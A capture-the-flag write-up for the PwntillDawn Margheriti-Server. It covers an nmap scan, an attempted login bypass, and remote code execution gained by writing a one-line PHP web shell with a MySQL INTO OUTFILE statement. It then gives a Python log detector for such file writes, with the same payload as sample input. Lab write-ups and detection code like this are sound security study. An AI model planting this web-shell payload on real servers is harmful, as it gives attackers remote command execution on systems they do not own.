Hacking the Margheriti-Server — PwntillDawn CTF

Figure 1

Recon & Scanning

I began the attack by doing some active reconnaissance on the web application using the Nmap command "nmap -p 1-65535 -T4 -A -v 10.150.150.145", which scans all 65535 ports and reports the open ports and the services running on them.

Figure 2
Figure 3
Figure 4
Figure 5

Login Bypass

Based on the recon done earlier, I tried out some SQLi attacks using the login parameters but had no luck there. So I decided to go back to the contents of the "backup.zip" file (see Figure 6) that I had downloaded and take a second look at it.

Figure 6
Figure 7
Figure 8

Gaining Shell Access/RCE

Ultimately, the goal is to gain shell access and run commands on the remote server. So, leveraging the DB access, I ran the following statement: SELECT "<?php system($_GET['cmd']); ?>" into outfile "/var/www/html/cmd.php", which wrote the file "cmd.php" into the html folder.

Figure 9
Figure 10
Figure 11
Figure 12
Figure 13
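For defenders, the file write above is visible in the database's query log. The following is an added example, not part of the original write-up: a small detector that flags INTO OUTFILE / INTO DUMPFILE statements that write into web-served directories. The log layout (tab-separated MySQL general query log), the web-root list, the extension list and the sample lines are assumptions constructed for illustration.

```python
import re
from pathlib import PurePosixPath

# Assumed web-served directories and script extensions; adjust per host.
WEB_ROOTS = ("/var/www", "/usr/share/nginx", "/srv/www")
SCRIPT_EXTS = {".php", ".phtml", ".php5", ".phar", ".jsp", ".aspx"}

# INTO OUTFILE / INTO DUMPFILE followed by a quoted path (single or double quotes).
EXPORT_RE = re.compile(r"""\binto\s+(outfile|dumpfile)\s+(['"])(.+?)\2""", re.I | re.S)
# Server-side code markers inside the data being exported.
CODE_RE = re.compile(r"<\?(php|=)|<%", re.I)

def classify(statement):
    """Return a finding dict for a file-export statement, or None."""
    m = EXPORT_RE.search(statement)
    if not m:
        return None
    path = PurePosixPath(m.group(3))
    reasons = []
    if any(str(path).startswith(root + "/") for root in WEB_ROOTS):
        reasons.append("target under web root")
    if path.suffix.lower() in SCRIPT_EXTS:
        reasons.append("script extension")
    if CODE_RE.search(statement[:m.start()]):
        reasons.append("server-side code in selected data")
    severity = "high" if len(reasons) >= 2 else "medium" if reasons else "info"
    return {"path": str(path), "severity": severity, "reasons": reasons}

def scan(log_lines):
    """Return (line_no, finding) for every export statement in the log."""
    out = []
    for no, line in enumerate(log_lines, 1):
        # Assumed layout: "<timestamp>\t<thread id> <command>\t<argument>"
        parts = line.rstrip("\n").split("\t", 2)
        if len(parts) < 3 or not parts[1].strip().endswith("Query"):
            continue
        finding = classify(parts[2])
        if finding:
            out.append((no, finding))
    return out

# Constructed sample log lines (not captured from the server in this write-up).
SAMPLE = [
    "2024-01-01T10:00:00.000000Z\t   12 Connect\tapp@localhost on shop",
    "2024-01-01T10:00:01.000000Z\t   12 Query\tSELECT id, name FROM products",
    "2024-01-01T10:00:05.000000Z\t   12 Query\tSELECT * FROM orders INTO OUTFILE '/var/lib/mysql-files/orders.csv'",
    "2024-01-01T10:00:09.000000Z\t   12 Query\tSELECT \"<?php system($_GET['cmd']); ?>\" into outfile \"/var/www/html/cmd.php\"",
]

if __name__ == "__main__":
    for no, f in scan(SAMPLE):
        print(no, f["severity"], f["path"], ", ".join(f["reasons"]))
```

On the prevention side, MySQL's secure_file_priv setting restricts where such exports may be written, and the statement requires the FILE privilege, which an application account normally does not need.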
